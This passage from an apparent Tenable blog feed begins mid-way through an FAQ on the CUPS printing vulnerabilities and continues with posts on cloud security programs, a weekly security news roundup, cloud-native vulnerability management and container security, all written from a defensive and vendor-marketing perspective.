* Still no CVE assigned (there should be at least 3, possibly 4, ideally 6).
* Still no working fix.
* Canonical, RedHat and… pic.twitter.com/N2d1rm2VeR

— Simone Margaritelli (@evilsocket) September 23, 2024

On September 26, Margaritelli posted on X that full disclosure would be happening at 20:00 UTC despite the early posts suggesting that full disclosure would be withheld until early October.

Full disclosure happening at 20:00 UTC today, in a bit more than 2 hours.

— Simone Margaritelli (@evilsocket) September 26, 2024

Were these exploited as zero-days?

No. There is currently no evidence that these vulnerabilities have been exploited in the wild as zero-days prior to disclosure on September 26.

Were these exploited after the public disclosure?

Yes. According to researchers at Datadog Security Labs, opportunistic scanning was detected for vulnerable systems in the “first hours following disclosure” which included exploitation attempts to install a malicious printer on a targeted system.

Is there a proof-of-concept (PoC) available for these vulnerabilities?

A proof-of-concept (PoC) developed by Margaritelli is included in the GitHub advisory for CVE-2024-47176. Additionally, a PoC has been published on GitHub based on a commit in the OpenPrinting CUPS repository.

Are patches or mitigations available?

Due to the early public disclosure, there are currently no patches available for the four vulnerabilities disclosed on September 26. However, to mitigate these flaws until the patches are available, it is advised to disable and remove cups-browsed from vulnerable systems. Additionally, CUPS is set to listen on UDP port 631, so it is advised to block all traffic to UDP port 631.

A security bulletin published by Red Hat highlights mitigations for high availability and non-high availability scenarios, the latter essentially stopping and disabling the cups-browsed service. In high availability scenarios they advised changing the BrowseRemoteProtocols directive values from default “dnssd cups” to “none.”

How many internet facing assets are potentially impacted by these vulnerabilities?

CUPS is not installed by default with many *nix distributions. In many distributions, the default configuration should limit the ability to access the default port.

As of September 26, a search on Shodan.io showed just over 75,000 internet-accessible hosts running CUPS. A search on the FOFA Search Engine returned over 270,000 unique IP addresses with nearly 70,000 linked specifically to IPP. Based on these findings, there are a significant number of hosts that do appear to be internet-accessible with a majority of the results using the default port, 631.

Source: Shodan.io

Source: FOFA

How can I detect if any of my external assets have the CUPS service running?

Tenable Attack Surface Management is able to detect various versions of the CUPS service running on internet connected assets. With robust filtering, this allows precise identification of these affected assets.

 

Has Tenable released any product coverage for these vulnerabilities?

A list of Tenable plugins for these vulnerabilities can be found on the individual CVE pages as they’re released:

This link will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.

Additionally, a remote direct check for CVE-2024-47176 has been developed and will be available soon.

Get more informationChange Log

Update September 27: The blog has been updated to include information about in-the-wild exploitation attempts, information on detecting external assets using Tenable Attack Surface Management and the upcoming availability of a remote direct check plugin.

Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

Tenable Security Response Team

Establishing a Cloud Security Program: Best Practices and Lessons Learned

Tenable Blog
1 month 3 weeks ago

As we’ve developed Tenable’s cloud security program, we in the Infosec team have asked many questions and faced interesting challenges. Along the way, we’ve learned valuable lessons and incorporated key best practices. In this blog, we’ll discuss how we’ve approached implementing our cloud security program using Tenable Cloud Security, and share recommendations that you may find helpful.

Cloud security has become a top priority for many organizations due to the increasing complexity of cloud environments and the rising number of security threats. To help identify and manage these security risks, many organizations use cloud-native application protection platform (CNAPP) solutions. However, even with the best tools in place, you still need an effective strategy to maintain a strong cloud-security posture long term.

Over the last few years, we at Tenable’s Infosec team have encountered a number of cloud security challenges and have learned valuable lessons about how to develop an effective cloud security program. Like many of our customers, we’ve asked a lot of questions around responsibilities, remediation, metrics and reporting. 

In this blog, we’ll discuss how we’ve approached implementing our cloud security program using Tenable Cloud Security, and include recommendations that may help you enhance your own security program. We’ll address issues such as the importance of establishing cloud-account visibility and ownership, and of ensuring account compliance using reports. We’ll also offer recommendations to help prioritize remediation efforts. 

Set up cloud accounts

Regardless of how large or small your cloud footprint is, it’s important to know what cloud accounts you have. Whether you have production, development or sandbox accounts, or a combination of them, it’s important to determine what resources are running within those accounts and how they are used. 

For example, if you don’t have full visibility into your cloud footprint, you can easily end up with resources that are overprivileged or publicly accessible, due to issues such as shadow IT, employee turnover and recent mergers or acquisitions. Knowing how your accounts are used can help you effectively organize and manage them within Tenable Cloud Security.

Before onboarding accounts, it’s important to determine how you want to structure them within Tenable Cloud Security. Whether you have multiple organizations or individual accounts to onboard, you can easily structure them within the console using folders. Folders provide a great option to logically group accounts based on business units, production or development environments.


If you are onboarding an Amazon AWS, Microsoft Azure, Google Cloud Platform (GCP) organization or an Oracle Cloud Infrastructure (OCI) tenancy, you can configure your settings to automatically onboard new accounts and update the folder structure as your cloud environment changes. 

Determine account owners

Once your accounts have been onboarded, next you will need to assign owners to your accounts. Account owners serve as the primary contacts and decision makers for their accounts. They are responsible for ensuring overall account security and they accept the risk on all excluded resources within the accounts, regardless of ownership. 

We recommend having at least two account owners, with one of them being a manager or above. This setup not only provides a great backup solution, it also provides a contact that can make decisions about cost issues, address security questions, and approve access requests for that account. 

As you work to identify and select account owners, we also recommend obtaining email addresses for each account. That way, security teams can contact account owners about any account-related issues. Reports can also be created within Tenable Cloud Security and automatically emailed to teams on a regular basis. 

Choosing account owners can be time-consuming depending on the number of cloud environments you have. As your organization changes, we recommend keeping track of your accounts and owners outside of the CNAPP platform in a centralized, accessible location for all teams to review. 

Set up access

Once you’ve selected your account owners, the next step is to establish who needs access to your accounts. First, we recommend reviewing which teams are accessing each account, the level of access, and number of resources they are managing. This information will help you to determine who the primary team will be for each account and what permissions they need within Tenable Cloud Security. 

In most cases, primary teams include both the account owners and associated team members. However, access to some accounts may include just the account owners. For example, if your site reliability engineering (SRE) team manages many resources within your Production account, and has full admin access, they should be set as the primary team within Tenable Cloud Security.

Primary team members get assigned to the Collaborator role, which allows them to fully manage policy exclusions, and add manual labels to resources. By using this role, you prevent other teams with Viewer role access to the account from adding unauthorized exceptions on findings they may or may not own.

If you have multiple teams accessing an account, you may need to provide access to secondary teams within Tenable Cloud Security. Secondary teams get assigned to the Viewer role on accounts where they manage resources. This role is ideal to use if you have multiple engineering teams that manage resources within an account, so they can review and remediate findings. 

Finally, your IT or Infosec teams would get access to the Administrator role in Tenable Cloud Security. This access allows them to onboard accounts, configure settings and integrations, and manage JIT access within the console.

Just like with your cloud accounts, not every team needs to have access to login and access resources. Implementing access controls using Tenable Cloud Security will help to ensure that authorized team members have access to approved accounts. 

Monitor compliance 

One major aspect of any cloud security program is ensuring compliance with industry standards that meet your legal, regulatory and business requirements.

Tenable Cloud Security provides many options to help you continuously monitor your security posture against standards such as the Center for Internet Security (CIS) Benchmarks, the General Data Protection Regulation (GDPR), and the NIST Cybersecurity Framework (CSF).

Before enabling those standards, you should determine what types of resources or data that you need to protect. 

If you are running Kubernetes clusters, we recommend onboarding your clusters to Tenable Cloud Security for additional visibility and coverage on your Kubernetes and container environments. There are two convenient ways you can implement Kubernetes Security Posture Management (KSPM) coverage: either via Helm charts or by granting network access within the cluster. If you have any virtual machines or containers running within your accounts, you can enable Workload Protection to identify and report on vulnerabilities within your cloud workloads. 

After enabling the compliance standards, you should work to determine which accounts to enable compliance reporting on. Adding a Scheduled Report using the Open Findings report type, you can select the accounts and compliance standards, set a delivery time, and then add email addresses to send the CSV attachment on a recurring schedule. 


 

 

Within the console, team members with access to the account can download past reports that are archived in the Reports History section. Even if a team member does not have direct access to Tenable Cloud Security, that’s completely fine. Information within the CSV attachment includes all of the applicable information for anyone to quickly view the resource location, severity level and steps to remediate that finding within an account.

Review and remediate findings

When reviewing findings within Tenable Cloud Security, teams have often asked us where to start and how to prioritize those remediation efforts. We recommend teams first review resources within their account, and use the Tags filter to highlight the resources they manage. 


Having a consistent tagging policy is critical to any successful cloud security program, as it allows teams to manage resources by parameters such as cost, teams and purpose as your organization changes. Failure to tag resources on a consistent basis can lead to increased costs and to longer incident response times, and impact compliance efforts.

If you don’t have a consistent tagging policy implemented within your cloud infrastructure, the Labels feature within Tenable Cloud Security provides a great option to help with those efforts. Teams with Collaborator or Administrator role access can use automatic Labels that are applied based on tags, or manual Labels that are applied to resources.

So if you have IT, Engineering, or other teams that manage resources in your account, or if the target resource doesn’t support tagging, using Labels provides a great solution to quickly identify resource owners, which will help with remediation efforts.

When you are ready to address findings, we recommend prioritizing remediation efforts in this order. 

  • Address resources with critical and high severity findings. 
  • Patch operating systems that are outdated or nearing end-of-life.
  • Review and remediate overprivileged resources.
  • Remove exposed secrets.
  • Delete all unused and inactive resources.

Tenable Cloud Security also provides options to send alerts to team members via email or Slack about resources based on specific criteria within your accounts. These suggestions provide a good starting point to help you decide what needs your immediate attention and what can be addressed later on.

Exclusions

In any organization, there will always be security issues that are left unaddressed for a variety of reasons. After remediating findings, you may have resources that you need to add exceptions on. Tenable Cloud Security provides options for permanent and temporary exceptions to meet your organizational requirements. For permanent exceptions, we recommend two use cases where exclusions are granted and considered acceptable:

  • You have a compensating control in place that mitigates the risk.
  • You cannot remediate the Failed finding due to an explicit business use-case requirement. 

Regardless if you have a corporate policy in place or not, it’s important to hold account owners responsible for excluded resources for the accounts they manage. Once a finding is excluded, it becomes part of the risk-acceptance process and will impact your overall compliance scores. 

Within Tenable Cloud Security, you can add exclusions in several ways. Examples of permanent exclusions could include any public-facing resources that might be used by customers, such as an AWS EC2 instance, bucket or storage account. Time-based exclusions could be resources with vulnerabilities that can be patched within a future sprint. If the deadline is missed, that exception expires and the resource finding will move back to the open findings queue.

You also have the option to manage exclusions for each policy that allows you to exclude resources either individually or by pattern. 

When excluding a resource by pattern, you have the option to add by Amazon Resource Names (ARN), Name or Tag. This feature allows you to exclude multiple resources at once across your organization.

Key performance indicators (KPIs)

Once you have addressed your findings, the next step is measuring compliance metrics and performance over time. Key performance indicators (KPIs) are used to assess an organization's compliance efforts against a known compliance standard. As part of a mature cloud security program, tracking KPI metrics on a monthly basis is a good starting point. It’s also important that you work with your leadership team to determine and agree on a set of KPIs to monitor as part of your program.

One example of a KPI could be to maintain at least 85% or higher for a passing compliance score. Once those KPIs are determined and agreed to, teams can track those changes under the Dashboard section within the Tenable Cloud Security console.

To monitor those changes, first select the target account within the upper right corner of the console. Under the Dashboard section, review the Compliance widget to monitor changes over the last 7, 30, or 90 days.

You can also review a breakdown of compliance scores under the Compliance section.



Present cloud security program to account owners

As a final step, we recommend meeting with account owners to go over the details of the cloud security program. When presenting this information, it’s important to discuss the reasons for implementing this program and what account owners are responsible for ensuring. Account owners should be aware that a cloud security program is designed to help ensure data privacy and regulatory compliance, as well as protect against security risks.

It’s also important to communicate with account owners what accounts they manage and will have access to within Tenable Cloud Security. For compliance reports, details on what will be provided to account owners should be included. Providing suggestions on how teams can get started by reviewing and remediating findings will be helpful. Also include information on the exclusion process and the acceptable use cases for your organization. Lastly, include what KPIs account owners should aim for. 

Creating an internal documentation page that includes the account name, applicable compliance standards and account owners will be helpful as a reference for existing and future account owners.

Conclusion

Developing a cloud security program isn’t just a one-time rollout. Maintaining a strong program is a constant effort that requires support from all teams within your organization. We hope that the lessons learned and best practices we’ve shared here will help you boost your cloud security program strategy with the aid of our comprehensive Tenable Cloud Security solution.

To get more information on Tenable Cloud Security, and how you can use it to enhance your cloud security program, check out the white paper “Empower Your Cloud: Mastering CNAPP Security” and blog “If You Only Have Five Minutes, Here’s CNAPP in a Snap”.

Stephanie Dunn

Cybersecurity Snapshot: Critical Infrastructure Orgs Found Vulnerable to Basic Hacks, While New MITRE Tool Uses ML to Predict Attack Chains

Tenable Blog
2 months ago

Report finds that many critical infrastructure networks can be breached using simple attacks. Plus, a new MITRE Engenuity tool uses machine learning to infer attack sequences. Meanwhile, CISA will lead a project to standardize civilian agencies’ cyber operations. And get the latest on XSS vulnerabilities, CIS Benchmarks and a China-backed botnet’s takedown!

Dive into six things that are top of mind for the week ending September 20.

1 - CISA: Critical infrastructure orgs susceptible to common attacks

After assessing the security of 143 critical infrastructure organizations in 2023, the U.S. government found most of the networks could be breached using ordinary, well-known attack methods.

That’s according to “CISA Analysis: Fiscal Year 2023 Risk and Vulnerability Assessments,” a report about the risk and vulnerability assessments (RVAs) conducted by the Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Coast Guard (USCG).

Specifically, CISA and USCG assessors had the most success gaining initial access, attaining network permanence, evading defenses and moving laterally by using valid accounts, phishing schemes and default credentials – all simple attack methods.

For example, the use of valid accounts, which are legitimate accounts whose login credentials have been compromised, was the most successful attack technique for achieving:

  • Initial access (41.3%)
  • Persistence (42.2%)
  • Privilege escalation (44.7%)

Valid-account use also ranked as the second most successful attack technique for evading defenses.

(Source: “CISA Analysis: Fiscal Year 2023 Risk and Vulnerability Assessments” report, September 2024)

The report offers troves of recommendations to critical infrastructure organizations, including:

  • Adopt a secure password policy that requires phishing-resistant multi-factor authentication for remote access; strong passwords; unique credentials, and more.
  • Maintain a comprehensive asset inventory, and keep software updated and patched.
  • Segment networks and block outbound connections from internet-facing servers to prevent lateral movement and privilege escalation.

Each of the 143 critical infrastructure organizations received a report about their network security results, mapped to the MITRE ATT&CK framework. Each report included key findings, improvement recommendations, potential mitigations and attack path details.

To get more details, read the 24-page “CISA Analysis: Fiscal Year 2023 Risk and Vulnerability Assessments” report and complementary charts.

For more information about protecting critical infrastructure environments and about operational technology (OT) security, check out these Tenable resources:

2 - New MITRE tool uses ML to anticipate cyberattacks 

To help cybersecurity teams stay ahead of hackers, MITRE Engenuity has released a new browser-based tool designed to predict cyberattack sequences.

The Technique Inference Engine (TIE) lets cybersecurity pros input tactics or techniques from the MITRE ATT&CK knowledge base they’ve detected in their environment. Using a machine learning (ML) model, TIE then infers the following steps that attackers would most likely take.

“TIE will help analysts quickly understand what is likely to have happened next, based on a broad corpus of threat intelligence,” reads a MITRE Engenuity blog about the new tool.

(Source: MITRE Engenuity, September 2024)

With the TIE results in hand, cybersecurity teams can, among other things, do the following:

  • Prioritize techniques to look for while triaging an event.
  • Improve post-mortem incident analysis by highlighting potential gaps.
  • Help create adversary emulation plans.

“We’re delighted to provide the community with a tool that gives defenders a way to identify what you don’t detect,” the blog reads

MITRE Engenuity built TIE in collaboration with experts from nine other organizations, including Tenable Research.

“Tenable Research is proud to be a key contributor to the new MITRE Engenuity Technique Inference Engine (TIE) – a powerful resource for security teams. TIE leverages machine learning to predict adversarial behaviors based on real-world cyber threat intelligence, helping you stay one step ahead of attackers,” reads a Tenable LinkedIn post.

To get more details, check out:

3 - CISA: Fed agencies must adopt a common security posture

Is your company considering implementing a consistent and uniform set of foundational cybersecurity practices for all teams and departments throughout the organization? If so, you might want to check out how the U.S. government plans to do just that across 100-plus federal agencies.

CISA will be in charge of the project, which it detailed in the document “Federal Civilian Executive Branch (FCEB) Operational Cybersecurity Alignment (FOCAL) Plan,” announced this week.

The goal: To standardize the cybersecurity operations of civilian agencies in the executive branch, known by the acronym FCEB, to ensure they can all properly manage cyber risk in today’s complex and fast-evolving threat landscape.

 

Currently, these agencies architect their IT and cybersecurity operations independently, and consequently their ability to manage cyber risk varies. “There is no cohesive or consistent baseline security posture across all FCEB agencies” and as a result “the FCEB remains vulnerable,” CISA says in the FOCAL plan’s document.

“Collective operational defense is required to adequately reduce risk posed to more than 100 FCEB agencies and to address dynamic cyber threats to government services and data,” the plan’s document reads.

The FOCAL plan focuses on five core areas:

  • Asset management
  • Vulnerability management
  • Defensible architecture
  • Cyber supply-chain risk management
  • Incident detection and response

“The FOCAL Plan was developed for FCEB agencies, but public and private sector organizations should find it useful as a roadmap to establish their own plan to bolster coordination of their enterprise security capabilities,” reads a CISA statement.

To get more details, check out:

4 - FBI takes down China-controlled IoT botnet used to steal information

A botnet of 260,000-plus IoT devices used to conduct information-stealing attacks on behalf of China’s government against targets in the U.S. and abroad has been dismantled.

Working with international partners, the FBI led the operation against the botnet, which was active since 2021 and was controlled by Beijing-based IT contractor Integrity Technology Group, also known as Flax Typhoon.

Hackers working for Flax Typhoon created the botnet by breaching 260,000-plus consumer IoT devices in the U.S. and in other countries. By using these legitimate devices, the hackers made their attacks look like normal internet traffic. 

Flax Typhoon developed an application that allowed the hackers to control the botnet’s compromised devices, while another tool offered them a menu of malicious commands.

The infected devices, which included small office / home office (SOHO) routers, IP cameras, digital video recorders and network-attached storage devices, got disconnected from the botnet as part of the FBI’s operation. The devices’ legitimate operations weren’t disrupted.

These are some FBI recommendations for preventing the hijacking of IoT devices for botnets, and for protecting networks from active botnets:

  • Disable unused services and ports, such as remote management options and file sharing services.
  • Segment networks and use the least-privilege principle to limit the risk from compromised IoT devices.
  • Keep software and firmware patched and updated.
  • Replace default passwords with strong passwords.
  • Periodically reboot IoT devices, which terminates running processes and may remove some malware types.
  • Replace end-of-life equipment with products that vendors are actively supporting.

To get more details, check out:

For more information about IoT and OT security, check out these Tenable resources:

5 - CISA issues plea to end XSS vulnerabilities

Although cross-site scripting (XSS) vulnerabilities are easily preventable, software makers continue introducing them into their products, a situation that needs to stop.

So said CISA and the FBI in the fact sheet “Secure by Design Alert: Eliminating Cross-Site Scripting Vulnerabilities.

When software makers neglect to properly “validate, sanitize or escape inputs,” XSS vulnerabilities can crop up, allowing attackers to inject malicious scripts into web apps, according to the fact sheet.

“CISA and FBI urge CEOs and other business leaders at technology manufacturers to direct their technical leaders/teams to review past instances of these defects and create a strategic plan to prevent them in the future,” the fact sheet reads.

 

 

Recommendations for software makers to prevent XSS vulnerabilities include:

  • Validate the structure and meaning of inputs
  • Carry out code reviews
  • Use output-encoding functions in modern web frameworks
  • Conduct adversarial testing to assess the quality and security of code

For more information about XSS bugs:

6 - CIS publishes new, updated Benchmarks for Microsoft, Google and Apache products

Microsoft’s Windows Server OS. Google’s ChromeOS. Apache’s Cassandra database.

Those products are among the CIS Benchmarks that were either updated or newly released in August by the Center for Internet Security.

Specifically, these secure-configuration recommendations were updated in June:

 


In addition, CIS released brand new Benchmarks for Apache’s Cassandra 4.1 and Tomcat 10.1; FreeBSD 14 Benchmark v1.0.0; Google’s ChromeOS; and Ubuntu Linux 24.04 LTS.

Organizations can use the CIS Benchmarks’ secure-configuration guidelines to harden products against attacks. Currently, there are more than 100 Benchmarks for 25-plus vendor product families in categories including: 

  • cloud platforms
  • databases
  • desktop and server software
  • mobile devices
  • operating systems

To get more details, read the CIS blog “CIS Benchmarks September 2024 Update.” 

For more information about the CIS Benchmarks list, check out its home page, as well as:

Juan Perez

An Analyst’s Guide to Cloud-Native Vulnerability Management: Where to Start and How to Scale

Tenable Blog
2 months ago

Cloud-native workloads introduce a unique set of challenges that complicate traditional approaches to vulnerability management. Learn how to address these challenges and scale cloud-native VM in your org.

As enterprises continue their migration to cloud-native architectures, the need for advanced vulnerability management (VM) strategies tailored specifically for cloud has intensified. The complexities inherent in cloud-native workloads – including microservices, containers and serverless functions – render traditional VM approaches ineffective. This blog outlines the strategic necessity for cloud-native VM, the challenges specific to these environments, and pragmatic guidance for initiating and scaling a robust VM strategy.

Why do we need cloud-native vulnerability management? Why now?

The ongoing shift to cloud-native architectures compels us to evolve our VM practices. Traditional monolithic applications no longer dominate technology stacks, with distributed microservices and dynamic, scalable environments becoming the new standard. This change brings new threats that require sophisticated, continuous and context-aware security processes and tools.

These are the key drivers for cloud-native VM:

  • Dynamic and abstracted workloads: The transient nature of cloud-native components, which are often spun up and down in minutes, necessitates a shift from periodic scanning to real-time monitoring and mitigation.
  • Expanded attack surface: The exponential increase in microservices and APIs significantly expands the potential attack surface, requiring more granular and continuous vulnerability assessments.
  • CI/CD acceleration: The accelerated pace of deployment in CI/CD pipelines demands equally rapid and automated security processes, ensuring vulnerabilities are addressed before they reach production.
  • Shared responsibility in cloud security: Cloud providers and customers share the responsibility for security in cloud environments, requiring organizations to first precisely identify their duties, then execute comprehensive VM strategies that complement provider offerings.
Navigating the challenges of the cloud

As stated earlier, the attack surface exponentially expands in the cloud. Let’s dive into the specific of a few highly vulnerable cloud domains. 

  1. Container vulnerabilities: Containers share software components, which can propagate vulnerabilities across multiple instances if not adequately managed.
  2. Infrastructure-as-code (IaC) risks: Misconfigurations in IaC can lead to control-plane vulnerabilities, accelerating the need for secure coding practices and IaC auditing.
  3. Multi-cloud and hybrid complexity: Managing vulnerabilities across diverse cloud environments with different security controls and best practices introduces additional layers of complexity further driving the need for a unified VM strategy.
  4. Transient workloads: The ephemeral nature of cloud-native resources demands continuous, automated security monitoring rather than reliance on periodic scanning.
Initiating and scaling cloud-native vulnerability management

Security and risk management leaders or professionals embarking on a cloud-native vulnerability management strategy should:

  1. Start with comprehensive visibility:
    • Asset discovery and inventory: You can’t secure what you can’t see. Start by ensuring you have a comprehensive inventory of all assets across hybrid, multi-cloud environments, from development to production, including containers, virtual machines, serverless functions and APIs.
    • Continuous security monitoring: Adopt agentless tools that enable continuous monitoring and assessment of your cloud-native assets, providing real-time insights into potential vulnerabilities.
  2. Integrate security early in the development lifecycle:
    • Security in CI/CD pipelines: Embed security controls into CI/CD workflows to detect and address vulnerabilities early in the development lifecycle, reducing risk before deployment.
    • Automated pre-deployment testing: Deploy automated testing tools to identify vulnerabilities in code, container images and IaC templates before they are elevated to production.
  3. Adopt cloud-native security tools:
    • Container and Kubernetes security: Use security platforms designed for container environments that offer features such as real-time scanning, image verification and runtime protection.
    • Cloud-native application protection platforms (CNAPP): Implement CNAPP tools to continuously monitor cloud configurations, prioritize risks and ensure compliance across multi-cloud environments.
  4. Scale through automation and cross-platform standardization:
    • Automated vulnerability remediation: Quickly remediate identified vulnerabilities, minimizing the window of exposure and enhancing overall security posture by automating remediation workflows where appropriate for your risk appetite.
    • Standard policies across cloud platforms: Use exposure management techniques and policy-as-code (PaC) to maintain consistent security policies and enforcement across multi-cloud and hybrid environments, ensuring scalability and consistency
    • Risk-based Prioritization: Use technologies such as attack path management and toxic combinations to prioritize vulnerabilities based on their risk to critical assets, focusing on high-impact threats.
Your cloud-native vulnerability management action plan:Monday morningIn the next 90 daysIn the next  12 months

Define roadmap for implementing cloud-native VM best practices: 

  • Consult and partner with dev teams.
  • Define cloud VM requirements that are aligned to your organizational risk tolerance.
  • Run short trials of agentless. technologies and assess against requirements.

Scale to multi-cloud: 

  • Map out CI/CD pipeline, tools and integration needed.
  • Start scanning for known vulns in image and container OSS components first.

 

Secure and mature: 

  • Mature across multi-cloud by adopting a CNAPP solution.
  • Iterate on process to incorporate and refine exposure management program.

 

Conclusion

Cloud-native VM is not just an operational necessity; it is a strategic imperative for organizations seeking to secure their cloud deployments in an increasingly complex threat landscape. By understanding the unique challenges of cloud-native environments and adopting a methodical, scalable approach, organizations can build a resilient VM program that supports their cloud ambitions. Continuous evolution, driven by automation, DevSecOps integration and iterative improvements will be essential in maintaining a robust security posture in the cloud.

For more information on vulnerability management in the cloud watch the webinar “A Cyber Pro's Guide to Cloud-Native Vulnerability Management: Start, Scale, and Secure with Confidence” and check out the data sheet, “Cloud Workload Protection (CWP): Vulnerability Management built for multi-cloud environments.” 

Tom Croll

Mastering Containerization: Key Strategies and Best Practices

Tenable Blog
2 months ago

As organizations modernize their infrastructure, containers offer unparalleled flexibility and scalability but they also introduce unique security challenges. In this blog we explain container security challenges, identify top threats and share how the newly released Tenable Enclave Security can keep your containers secure.

Containers are changing enterprise IT and are now essential in modern app development. In my two decades as a cybersecurity practitioner, I have seen technologies evolve from offering efficiency to becoming vulnerable points of attack due to neglected security measures. Containers are no different. They provide unmatched flexibility and scalability, yet they also introduce specific vulnerabilities that, when not remediated, can weaken an entire organization's security posture.

The evolution of containers and the imperative of security

Containers have dramatically changed how organizations approach software development and deployment. Containers guarantee that software operates consistently in various environments by bundling an application and its dependencies into a single, transferable unit. This is a big change for development teams, enabling quick iteration and deployment. Yet, this flexibility introduces a complicated security environment that calls for a change in how organizations approach incorporating security into their development processes.

Containers, in contrast to traditional virtual machines, are lightweight, depend on the host operating system's kernel and frequently utilize shared images from both public and private registries. These interdependencies result in an environment in which a single weakness can lead to a series of consequences, highlighting the importance of container security as a vital necessity rather than just a recommended measure.

One base image can create thousands of attack points within an environment, so it is critically important to understand the base image vulnerabilities to reduce propagation to subsequent images.

Why security must begin at the container's creation

Benjamin Franklin said, "an ounce of prevention is worth a pound of cure," and this rings especially true in the context of containers. The security of a containerized environment hinges on decisions made at the very beginning of the container lifecycle — during the creation phase. Here’s why:

  1. Avoiding the pitfalls of security debt: Security debt accumulates when vulnerabilities are embedded in container images from the start. As containers transition from development to production, addressing these vulnerabilities becomes increasingly difficult and more expensive, particularly in a fast-paced DevOps environment. By incorporating security measures such as automated vulnerability scanning and secure configuration management early on, you can prevent exposures from growing into larger, more complex issues that would require significant resources to resolve later on.
  2. Mitigating supply chain threats: Containers often depend on a variety of third-party libraries and components, which can introduce vulnerabilities if not carefully vetted. By embedding security checks during the creation phase, including dependency scanning and verification, you reduce the risk of incorporating compromised or malicious code into your container images. This approach not only secures your own code but also fortifies the broader software supply chain.
  3. Ensuring robust runtime security: The configurations designed during the creation of a container — including access controls, resource limits and network policies — directly influence its security posture at runtime. A container built with security in mind will be less susceptible to common attacks like privilege escalation or container escape, thereby reducing the attack surface and safeguarding the runtime environment.
  4. Analyzing layers as a defensive strategy: Containers are constructed in levels called layers, with each one symbolizing a distinct step in the image formation process. This complex structure, although effective, may contain undisclosed weaknesses. Performing a comprehensive analysis of each layer is essential so you can recognize and address potential risks during each phase. By examining every layer, eliminating unnecessary parts and confirming that all layers are current and clear of identified vulnerabilities, you enhance the container's security as a whole. Consistently reviewing these layers in your security procedures helps prevent new vulnerabilities from being overlooked.
  5. Setting the stage for continuous security monitoring: Early integration of security practices enables continuous monitoring throughout the container lifecycle. Taking a proactive approach enables immediate identification and response to threats, guaranteeing timely detection and resolution of potential vulnerabilities before they can be taken advantage of.
The high stakes of container attacks: what’s at risk?

Understanding the potential consequences of container breaches is essential to appreciating the importance of proactive security measures. Here’s a deep dive into some of the most pressing threats and their implications:

  1. Image poisoning: Malicious actors can breach container images by injecting harmful code or exploiting weaknesses. This could happen at different stages of the supply chain, from vulnerable developer environments to public or private registries. What’s worse, after these toxic images are initially used in an attack, if not remediated, they can be re-used to launch more attacks, which can lead to consequences such as attackers gaining unauthorized entry and stealing data.
    • Consequences: Image poisoning creates an ease of persistence for attackers. If a container registry is compromised and an attacker is able to make changes to multiple containers, they can add code for persistent payloads, malware or exfiltration to the containers, which will then be run every time that container is launched. A poisoned image can lead to widespread compromise across multiple environments, particularly in organizations that rely on standardized images for deployment.
  2. Runtime exploits: Containers, by design, have the same OS kernel shared, leaving them susceptible to kernel-level attacks when isolation is lacking. Malicious individuals can use these weaknesses to break out of the container, take over the host system and potentially reach other containers on the same host.
    • Consequences: A host system can be completely compromised through a successful runtime exploit, allowing attackers to move freely across the network. This could result in a complete breach, loss of data and disruption of essential services, causing lasting damage to an organization's operational stability.
  3. Container escape: Container escape occurs when an attacker breaks out of a container’s isolated environment to execute code on the host system. This can happen due to misconfigurations, unpatched vulnerabilities or privilege escalation attacks.
    • Consequences: A breach in a container could put the entire host system at risk, leading to unauthorized access to important data and systems. The outcomes could be substantial, requiring comprehensive incident response actions and possibly resulting in regulatory penalties and loss of trust from customers.
  4. Supply chain attacks: Containers frequently depend on external components, which makes them particularly vulnerable to supply chain attacks. These incidents involve attackers compromising dependencies or registry services in order to insert vulnerabilities into container images.
    • Consequences: Supply chain attacks are frequently discreet and are typically unnoticed until they have spread through various environments. Tracing and fixing the security breaches that occur can be difficult, which can prolong exposure to threats and disrupt operations significantly.
A checklist for securing containers

Securing containers requires a multi-faceted approach that addresses every stage of the container lifecycle. Five key strategies are listed below. For a comprehensive checklist review, read the white paper Checklist: Securing containers from development to runtime

  1. Secure-by-design: Integrate security into the container development process from the onset. Use automated tools to scan for vulnerabilities and enforce secure configurations before containers are deployed.
  2. Regular vulnerability scanning: There will always be new vulnerabilities. Embedding regular vulnerability scanning is a critical part of maintaining secure containers. Scans should be done on the image registry or as part of the CI/CD pipeline and, where vulnerabilities are found, images should be re-built and re-deployed. Automate patch management to ensure that vulnerabilities are addressed promptly and consistently.
  3. Layer analysis: Conduct thorough layer analysis of container images. Scan each layer for vulnerabilities, remove unnecessary components and ensure that all layers are up-to-date. This process should be iterative, with regular re-evaluation to account for new threats. Regularly run searches for known malicious code against all image layers to identify compromises.
  4. Prioritize vulnerabilities for remediation: Organizations can quickly lose control of security risks if vulnerabilities are not effectively prioritized. Choose a container security solution that uses threat intelligence to help you prioritize what to fix first. 
  5. Use trusted base images: Only use base images from verified, trusted sources. Regularly scan these images for vulnerabilities and rebuild them frequently to incorporate security updates.
Securing containers with Tenable Enclave Security

We’re excited to announce Tenable Enclave Security, a new product designed to help highly secure environments expose and close IT and container vulnerabilities. 

Tenable Enclave Security enables you to quickly know the risk in your IT assets and container images, expose their vulnerabilities and understand their breadth of impact and close exposures using priority scores to speed remediation efforts. Tenable Enclave Security protects containers by embedding security from the start, making it easy for DevOps teams to quickly detect and fix container vulnerabilities before they hit production, conducting thorough analysis into all images, layers and packages that need attention, reducing risk and ensuring the integrity of your containerized environments. Vulnerability priority scores help you focus your efforts on the most critical vulnerabilities to reduce vulnerability overload and maximize productivity. 

Built specifically for highly secure environments, Tenable Enclave Security meets the needs of organizations with stringent cloud security and data residency requirements, such as those operating in classified or air-gapped environments, or federal agencies requiring FedRAMP High or Impact Level 5. Tenable Enclave Security helps government agencies meet key standards and guidelines for securing container environments such as National Institute of Standards and Technology (NIST) SP 800-190 and Center for Internet Security (CIS) Docker Benchmarks and CIS Kubernetes Benchmark. 

Conclusion

In the ever-changing realm of cybersecurity, containers bring about potential advantages as well as obstacles. Although containers foster flexibility and creativity, they also require a proactive and thorough security strategy. By integrating security at the beginning, carrying out comprehensive layer examination, and following established government guidelines, organizations can greatly lower their risk and protect the authenticity of their containerized setups.

Based on my experience, I have seen the outcomes of ignoring security measures. The organizations that prioritize security throughout the container lifecycle are the ones that will succeed in their efforts to embrace and use container technologies. As we progress in this world of containerization, let's stay alert, knowledgeable and steadfast in our dedication to securing the future of our systems.

For more information
Zach Bennefield

